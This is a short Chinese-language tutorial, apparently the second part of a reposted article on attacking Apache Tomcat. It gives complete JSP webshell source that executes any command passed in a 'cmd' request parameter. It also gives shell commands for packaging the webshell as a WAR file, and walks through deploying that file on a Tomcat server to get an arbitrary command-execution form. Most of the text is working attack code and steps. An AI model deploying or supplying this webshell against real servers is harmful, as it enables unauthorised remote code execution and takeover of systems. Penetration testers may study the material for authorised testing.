攻击Tomcat的多种姿势(2)

发布时间：2019-02-14 05:20 所属栏目：16 来源：嘶吼专业版

导读：一旦执行了上述命令，我们就可以直接获得一个webshell了，如下图所示：生成JSP webshell 接下来，我们就来看看如何生成和部署webshell来获得Tomcat应用中的执行命令。首先，我们需要写一个webshell并且打包成war

一旦执行了上述命令，我们就可以直接获得一个webshell了，如下图所示：

攻击Tomcat的多种姿势

生成JSP webshell

接下来，我们就来看看如何生成和部署webshell来获得Tomcat应用中的执行命令。

首先，我们需要写一个webshell并且打包成war格式。我们可以使用下面的代码来写一个webshell：

<%@ page import="java.io.*" %> 
<% 
   String cmd = request.getParameter("cmd"); 
   String output = ""; 
   if(cmd != null) { 
      String s = null; 
      try { 
         Process p = Runtime.getRuntime().exec(cmd,null,null); 
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 
         while((s = sI.readLine()) != null) { output += s+" 
"; } 
      }  catch(IOException e) {   e.printStackTrace();   } 
   } 
%> 
<%=output %>

保存代码为index.jsp文件，然后使用下列命令来打包：

mkdir webshell 
cp index.jsp webshell/ 
cd webshell 
jar -cvf ../webshell.war *

攻击Tomcat的多种姿势

执行完这条命令，你就能生成一个war文件，你可以将这个war文件部署在Tomcat应用中。

如下图所示，你可以看到，我已经成功上传并部署了webshell.war文件，现在我们点击这个文件来执行：

攻击Tomcat的多种姿势

在执行/webshell时，你会得到一个404错误页面，现在再执行webshell下的index.jsp文件，如下：

http://192.168.1.106:8080/webshell/index.jsp

访问了上述URL后，你会得到一个命令执行的表单，现在你就可以在这个表单上任意执行cmd命令了，如图：

攻击Tomcat的多种姿势

本文到此结束，希望大家有所收获。

（编辑：ASP站长网）